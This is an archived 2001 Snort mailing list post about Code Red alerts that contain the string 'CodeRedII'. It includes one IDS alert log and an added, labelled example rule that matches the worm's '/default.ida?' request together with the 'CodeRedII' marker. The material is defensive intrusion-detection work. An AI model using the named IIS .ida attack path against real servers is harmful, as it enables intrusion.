Snort mailing list archives
CodeRedII again?
From: Pontus Joakimsson <jpontus () ess nec de>
Date: Wed, 22 Aug 2001 14:35:52 +0200
Hi,

Had a warez "attack" on our web/ftp server the last two days (thinking of writing some rules for detecting it, can be interesting?), and noticed quite some Code Red alerts in the logs. The thing I reacted on was that it contained the string "CodeRedII"... Anyone know about this variant?

btw. does anyone know if it's possible to add more than one "detection-string" to a rule?

Regards,
Pontus Joakimsson

------------------------------------------------------------
[**] WEB-IIS ISAPI .ida attempt [**]
08/22-09:48:13.441655 210.111.15.79:1476 -> x.x.x.x 80
TCP TTL:104 TOS:0x0 ID:13484 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x3F4EE63E Ack: 0x15A91A99 Win: 0x4470 TcpLen: 20
------------------------------------------------------------
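A Snort rule with two content keywords, added here as an illustration and not taken from the post or from the Snort rule distribution: every content string in a rule must match the same packet for the rule to fire, so listing a second one narrows the match. The msg text and the sid value are assumptions.

```snort
# Added example, not from the post or the Snort rule set.
# Two content keywords in one rule are ANDed: both strings must be found
# in the packet payload. The first is the .ida request from the alert
# above, the second is the "CodeRedII" marker seen in the payload.
# sid 1000001 is a placeholder in the local-rule range.
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"WEB-IIS ISAPI .ida attempt with CodeRedII marker"; flags:A+; content:"/default.ida?"; nocase; content:"CodeRedII"; sid:1000001; rev:1;)
```

Because both strings are required, this rule fires on fewer packets than the generic .ida rule that produced the alert above; keep that rule as well if the broader alert is still wanted.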
Current thread:
- CodeRedII again? Pontus Joakimsson (Aug 22)
- Re: CodeRedII again? Ryan Russell (Aug 22)
- Re: CodeRedII again? Skip Carter (Aug 22)